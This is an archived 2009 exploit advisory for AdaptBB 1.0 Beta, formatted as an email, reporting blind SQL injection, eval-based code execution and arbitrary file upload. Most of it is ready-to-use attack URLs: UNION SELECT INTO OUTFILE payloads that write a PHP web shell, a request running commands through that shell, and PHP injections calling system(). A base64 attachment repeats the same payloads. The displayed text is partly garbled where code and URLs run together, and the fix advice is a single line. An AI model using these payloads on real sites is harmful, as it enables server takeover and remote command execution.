AOH :: HP Unsorted A :: VA3123.HTM

AdaptBB 1.0 Beta Multiple Remote Vulnerabilities



AdaptBB 1.0 Beta Multiple Remote Vulnerabilities
AdaptBB 1.0 Beta Multiple Remote Vulnerabilities



--001636c5b352b026cc04671f5b11
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 7bit

*******   Salvatore "drosophila" Fresta   *******

[+] Application: AdaptBB
[+] Version: 1.0 Beta
[+] Website: http://sourceforge.net/projects/adaptbb/ 

[+] Bugs: [A] Multiple Blind SQL Injection
          [B] Multiple Dynamic Code Execution
          [C] Arbitrary File Upload

[+] Exploitation: Remote
[+] Date: 09 Apr 2009

[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@gmail.com 


*************************************************

[+] Menu

1) Bugs
2) Code
3) Fix


*************************************************

[+] Bugs


- [A] Multiple Blind SQL Injection

[-] Risk: medium
[-] Requisites: magic_quotes_gpc = off
[-] File affected: almost all of the files are
vulnerable

This bug allows a guest to execute arbitrary SQL
queries.


- [B] Multiple Dynamic Code Execution

[-] Risk: hight
[-] File affected: almost all of the files are
vulnerable

This bug allows a guest to execute arbitrary php
code.

...

if ($_GET['box']) {
$folder = $_GET['box'];
}

...

$ddata[] = ucwords($folder);

...

eval (" ?> ".str_replace($cdata, $ddata,
stripslashes(template($view."_header")))." http://site/path/inc/attach.php?id=-1' UNION ALL SELECT '',2,3,4,5,6,7,8 INTO OUTFILE
'/var/www/htdocs/path/rce.php'%23

http://site/path/index.php?do=profile&user=blabla&box=-1' UNION ALL 
SELECT '',2,3,4,5,6,7,8 INTO OUTFILE
'/var/www/htdocs/path/rce.php'%23

http://site/path/index.php?do=messages&user=blabla&box=-1' UNION ALL 
SELECT '',2,3,4,5,6,7,8 INTO OUTFILE
'/var/www/htdocs/path/rce.php'%23

http://site/path/index.php?do=edit_post&id=-1' UNION ALL SELECT '',2,3,4,5,6,7,8,9 INTO OUTFILE
'/var/www/htdocs/path/rce.php'%23

To execute commands:

http://site/path/rce.php?cmd=uname -a 


- [B] Multiple Dynamic Code Execution

http://www.site.com/path/index.php?do=profile&user=blabla&box= 
echo "
"; system('ls'); echo "
"?>
http://www.site.com/path/index.php?do=messages&user=blabla&box= echo "
"; system('ls'); echo "
"?> ************************************************* [+] Fix To fix them you must check the input properly. However is not recommended to store your real username and password in the cookies. ************************************************* -- Salvatore "drosophila" Fresta CWNP444351 --001636c5b352b026cc04671f5b11 Content-Type: text/plain; charset=US-ASCII; name="AdaptBB 1.0 Beta Multiple Remote Vulnerabilities-09042009.txt" Content-Disposition: attachment; filename="AdaptBB 1.0 Beta Multiple Remote Vulnerabilities-09042009.txt" Content-Transfer-Encoding: base64 X-Attachment-Id: f_ftbhulod0 KioqKioqKiAgIFNhbHZhdG9yZSAiZHJvc29waGlsYSIgRnJlc3RhICAgKioqKioqKgoKWytdIEFw cGxpY2F0aW9uOiBBZGFwdEJCClsrXSBWZXJzaW9uOiAxLjAgQmV0YQpbK10gV2Vic2l0ZTogaHR0 cDovL3NvdXJjZWZvcmdlLm5ldC9wcm9qZWN0cy9hZGFwdGJiLwoKWytdIEJ1Z3M6IFtBXSBNdWx0 aXBsZSBCbGluZCBTUUwgSW5qZWN0aW9uCiAgICAgICAgICBbQl0gTXVsdGlwbGUgRHluYW1pYyBD b2RlIEV4ZWN1dGlvbgogICAgICAgICAgW0NdIEFyYml0cmFyeSBGaWxlIFVwbG9hZAoKWytdIEV4 cGxvaXRhdGlvbjogUmVtb3RlClsrXSBEYXRlOiAwOSBBcHIgMjAwOQoKWytdIERpc2NvdmVyZWQg Ynk6IFNhbHZhdG9yZSAiZHJvc29waGlsYSIgRnJlc3RhClsrXSBBdXRob3I6IFNhbHZhdG9yZSAi ZHJvc29waGlsYSIgRnJlc3RhClsrXSBDb250YWN0OiBlLW1haWw6IGRyb3NvcGhpbGF4eHhAZ21h aWwuY29tCgoKKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq KgoKWytdIE1lbnUKCjEpIEJ1Z3MKMikgQ29kZQozKSBGaXgKCgoqKioqKioqKioqKioqKioqKioq KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqCgpbK10gQnVncwoKCi0gW0FdIE11bHRpcGxl IEJsaW5kIFNRTCBJbmplY3Rpb24KClstXSBSaXNrOiBtZWRpdW0KWy1dIFJlcXVpc2l0ZXM6IG1h Z2ljX3F1b3Rlc19ncGMgPSBvZmYKWy1dIEZpbGUgYWZmZWN0ZWQ6IGFsbW9zdCBhbGwgb2YgdGhl IGZpbGVzIGFyZSAKdnVsbmVyYWJsZQoKVGhpcyBidWcgYWxsb3dzIGEgZ3Vlc3QgdG8gZXhlY3V0 ZSBhcmJpdHJhcnkgU1FMCnF1ZXJpZXMuCgoKLSBbQl0gTXVsdGlwbGUgRHluYW1pYyBDb2RlIEV4 ZWN1dGlvbgoKWy1dIFJpc2s6IGhpZ2h0ClstXSBGaWxlIGFmZmVjdGVkOiBhbG1vc3QgYWxsIG9m IHRoZSBmaWxlcyBhcmUgCnZ1bG5lcmFibGUKClRoaXMgYnVnIGFsbG93cyBhIGd1ZXN0IHRvIGV4 ZWN1dGUgYXJiaXRyYXJ5IHBocApjb2RlLgoKLi4uCgppZiAoJF9HRVRbJ2JveCddKSB7DQokZm9s ZGVyID0gJF9HRVRbJ2JveCddOw0KfQoKLi4uCgokZGRhdGFbXSA9IHVjd29yZHMoJGZvbGRlcik7 CgouLi4KCmV2YWwgKCIgPz4gIi5zdHJfcmVwbGFjZSgkY2RhdGEsICRkZGF0YSwgc3RyaXBzbGFz aGVzKHRlbXBsYXRlKCR2aWV3LiJfaGVhZGVyIikpKS4iIDw/cGhwICIpOwoKLi4uCgoKLSBbQ10g QXJiaXRyYXJ5IEZpbGUgVXBsb2FkCgpbLV0gUmlzazogaGlnaHQKWy1dIEZpbGUgYWZmZWN0ZWQ6 IGF0dGFjaC5waHAKClRoaXMgYnVnIGFsbG93cyBhIHJlZ2lzdGVyZWQgdXNlciB0byB1cGxvYWQg CmFyYml0cmFyeSBmaWxlcyBhbmQgdG8gZXhlY3V0ZSB0aGVtIGZyb20gCmluYy9hdHRhY2htZW50 cyBkaXJlY3RvcnkuIFRoaXMgaXMgcG9zc2libGUgCmJlY2F1c2UgdGhlcmUgYXJlIG5vIGNvbnRy b2xzIG9uIGZpbGUgZXh0ZW5zaW9uIApvbiB0aGUgc2VydmVyIHNpZGUgYnV0IG9ubHkgb24gdGhl IGNsaWVudCBzaWRlLiAKCgoqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq KioqKioqKioqCgpbK10gQ29kZQoKCi0gW0FdIE11bHRpcGxlIEJsaW5kIFNRTCBJbmplY3Rpb24K Cmh0dHA6Ly9zaXRlL3BhdGgvaW5jL2F0dGFjaC5waHA/aWQ9LTEnIFVOSU9OIEFMTCBTRUxFQ1Qg Jzw/cGhwIHN5c3RlbSgkX0dFVFtjbWRdKSUzYiA/PicsMiwzLDQsNSw2LDcsOCBJTlRPIE9VVEZJ TEUgJy92YXIvd3d3L2h0ZG9jcy9wYXRoL3JjZS5waHAnJTIzCgpodHRwOi8vc2l0ZS9wYXRoL2lu ZGV4LnBocD9kbz1wcm9maWxlJnVzZXI9YmxhYmxhJmJveD0tMScgVU5JT04gQUxMIFNFTEVDVCAn PD9waHAgc3lzdGVtKCRfR0VUW2NtZF0pJTNiID8+JywyLDMsNCw1LDYsNyw4IElOVE8gT1VURklM RSAnL3Zhci93d3cvaHRkb2NzL3BhdGgvcmNlLnBocCclMjMKCmh0dHA6Ly9zaXRlL3BhdGgvaW5k ZXgucGhwP2RvPW1lc3NhZ2VzJnVzZXI9YmxhYmxhJmJveD0tMScgVU5JT04gQUxMIFNFTEVDVCAn PD9waHAgc3lzdGVtKCRfR0VUW2NtZF0pJTNiID8+JywyLDMsNCw1LDYsNyw4IElOVE8gT1VURklM RSAnL3Zhci93d3cvaHRkb2NzL3BhdGgvcmNlLnBocCclMjMKCmh0dHA6Ly9zaXRlL3BhdGgvaW5k ZXgucGhwP2RvPWVkaXRfcG9zdCZpZD0tMScgVU5JT04gQUxMIFNFTEVDVCAnPD9waHAgc3lzdGVt KCRfR0VUW2NtZF0pJTNiID8+JywyLDMsNCw1LDYsNyw4LDkgSU5UTyBPVVRGSUxFICcvdmFyL3d3 dy9odGRvY3MvcGF0aC9yY2UucGhwJyUyMwoKVG8gZXhlY3V0ZSBjb21tYW5kczoKCmh0dHA6Ly9z aXRlL3BhdGgvcmNlLnBocD9jbWQ9dW5hbWUgLWEKCgotIFtCXSBNdWx0aXBsZSBEeW5hbWljIENv ZGUgRXhlY3V0aW9uCgpodHRwOi8vd3d3LnNpdGUuY29tL3BhdGgvaW5kZXgucGhwP2RvPXByb2Zp bGUmdXNlcj1ibGFibGEmYm94PTw/cGhwIGVjaG8gIjxwcmU+Ijsgc3lzdGVtKCdscycpOyBlY2hv ICI8L3ByZT4iPz4KCmh0dHA6Ly93d3cuc2l0ZS5jb20vcGF0aC9pbmRleC5waHA/ZG89bWVzc2Fn ZXMmdXNlcj1ibGFibGEmYm94PTw/cGhwIGVjaG8gIjxwcmU+Ijsgc3lzdGVtKCdscycpOyBlY2hv ICI8L3ByZT4iPz4KCgoqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq KioqKioqCgpbK10gRml4CgpUbyBmaXggdGhlbSB5b3UgbXVzdCBjaGVjayB0aGUgaW5wdXQgcHJv cGVybHkuCkhvd2V2ZXIgaXMgbm90IHJlY29tbWVuZGVkIHRvIHN0b3JlIHlvdXIgcmVhbCAKdXNl cm5hbWUgYW5kIHBhc3N3b3JkIGluIHRoZSBjb29raWVzLgoKCioqKioqKioqKioqKioqKioqKioq KioqKioqKioqKioqKioqKioqKioqKioqKioqKio--001636c5b352b026cc04671f5b11--

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.